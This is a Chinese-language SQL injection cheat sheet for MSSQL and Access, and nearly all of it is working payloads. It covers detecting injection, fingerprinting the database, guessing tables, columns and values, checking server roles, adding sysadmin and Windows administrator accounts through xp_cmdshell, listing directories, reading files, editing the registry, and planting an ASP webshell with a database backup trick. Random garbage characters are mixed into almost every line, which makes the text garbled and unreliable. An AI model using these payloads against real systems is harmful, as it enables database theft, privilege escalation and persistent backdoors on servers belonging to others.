1.判断是否有注入;and 1=1 ;and 1=2 #3=�P4FUz.
2.初步判断是否是mssql ;and user>0 m9}�AG Rj
�vP@v.6gS,
3.注入参数是字符'and [查询条件] and ''=' %�%ae^*[!n
:1q��4"tv|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' q�-ES��6�R
W,��@
If�}
5.判断数据库系统 �&5{xXW�JK
�m�V^Z�y�
;and (select count(*) from sysobjects)>0 mssql dBV7Te4L�
F(�#r�Q_z]
;and (select count(*) from msysobjects)>0 access �ZPN
roCK`
i�|)Su�4Dw
�y;?ie]3G�
JP�M))4YDR
6.猜数据库 ;and (select Count(*) from [数据库名])>0 L(>=�BK��*
�g �@�I6$Z
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 dU���znxZB
��V�}o n|A
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 39F��
O��f
M~*u;v�A/�
9.(1)猜字段的ascii值(access) |�IoB?^�_h
juF{}�J2�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |�]Z:&[D]i
e
pC�LM_yA
(2)猜字段的ascii值(mssql) ��x.0p%O=`
��R1:k23�{
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 (}�r�|yE��
mV73
\�P6K
10.测试权限结构(mssql) �I]"96'�|N
p,pR!q��C>
���@4(�k�(
SQ,?N
�XZ�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��<!$:8ls�
(KZHX�5�T=
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �d��m�"n�%
[a�o�
U5;7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��O|�A_PyW
;�R=.i��On
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �BG^C9*ZuP
R�.[Z]�-�X
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- $P7iRM��]�
�:M{Y,~cP
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- "TV(H�+1,z
!J�*,�)kRN
;and 1=(select IS_MEMBER('db_owner'));-- 3�(��$"q]Y
%u^�J�pC{E
@U�B�jq%z�
wfL-�oi�'5
11.添加mssql和系统的帐户 �R8L_J6Kpa
u�JR%0�E7!
;exec master.dbo.sp_addlogin username;-- qQi.?<d2"s
;exec master.dbo.sp_password null,username,password;-- thO ~=�RB�
Ko&hj XHx
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��.I VlEG0
3bqC\i^[\m
;exec master.dbo.xp_cmdshell 'net user username password �N!Qg�;��(
�W�D;Y~��|
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- z)XRx:YU;$
< _$�%@4 L
;exec master.dbo.xp_cmdshell 'net user username password /add';-- =&0��wr�6�
�Bx"��7%[�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �G�lq8��5S
]nQt>R p_�
r!�P}u����
yq_LW>�|Z�
12.(1)遍历目录 ��p2J|Hl|
6qe*���@�o
;create table dirs(paths varchar(100), id int) 6+V\t+�aug
w#JJXXQI��
;insert dirs exec master.dbo.xp_dirtree 'c:\' M'`��;{^�<
-S��,l�n��
;and (select top 1 paths from dirs)>0 Zn�,�>]X�
<�X�T��U8G
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��P�N~��@
S.B<pj�g�t
sG~<�M"znV
Z=4{��V�v*
(2)遍历目录
�B� .TB\j
Gc.P,K/�hr
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- sC�0�0un%
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 "M�|P�+�A
Y
�$g$�x<7
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 w�d�zOFDA
Z3�;���!l
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 z��3t~}�aL
���KtS)'jf
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Q "�oI])r
4GG>!�@�|
_<$>*�i
R�
E6Rz@"^XV�
13.mssql中的存储过程 <J���(�sR
��Ae^X35�
xp_regenumvalues 注册表根键, 子键 �/$n ~�l�f
�xRu�Fu�f8
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 C
]Si|D���
6m����.k;'
xp_regread 根键,子键,键值名 ~�,�D@8t�v
GN#<yv$av
;exec xp_regread "I;�C;}��!
5e�p�/h5*/
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g��u)=wu0
}],Z;�:���
xp_regwrite 根键,子键, 值名, 值类型, 值 WqxUX���H�
O�2{)WW�OT
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 l��cO�N�+j
�*5s�B�hx�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ?^'
7+8C*J
UE _�fp��q
xp_regdeletevalue 根键,子键,值名 _u"nvgVz�9
�2LC�B])�X
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 M)?dEg�U}M
~mV�"i7VX�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 g#���NZ ,~
_a_x�z�v'�
b�G&"9�b_c
}�14�{2=!Q
14.mssql的backup创建webshell $=sXAK9 �
IUG�z �=%[
use model z
�s��Qo$p
i$^)U�ZJ&0
create table cmd(str image); C0�.'�_��
eZ� a�:o1y
insert into cmd(str) values (''); -3Avs9�`5�
[LT��^sb��
backup database model to disk='c:\l.asp'; |�6J�� ?8y
�4��@�IL�w
|{g��+�Y
Gws��Y-jf�
15.mssql内置函数 �HhA� �-[p
y��`e4;*�1
;and (select @@version)>0 获得Windows的版本号 f0+2�t.tj�
JXi�Z�B
8}
;and user_name()='dbo' 判断当前系统的连接用户是不是sa {P8[X�@Lu
�n<Svw��a}
;and (select user_name())>0 爆当前系统的连接用户 �wI� M{pK
�{v�a�a�Fs
;and (select db_name())>0 得到当前连接的数据库 B}OY�/J/*8
�Gx?+9C�V
p�6ED�Qwlf
�+��c:�3o*
16.简洁的webshell �7Y=cn_
wU
d
{����lP�
use model ?:^mB�b)�T
"%W�gT2)m.
create table cmd(str image); 0)Y��b�I!�
Ap�&)6g� �
insert into cmd(str) values (''); J� MX6�yV
"wH)��mQnd
backup database model to disk='g:\wwwtest\l.asp';
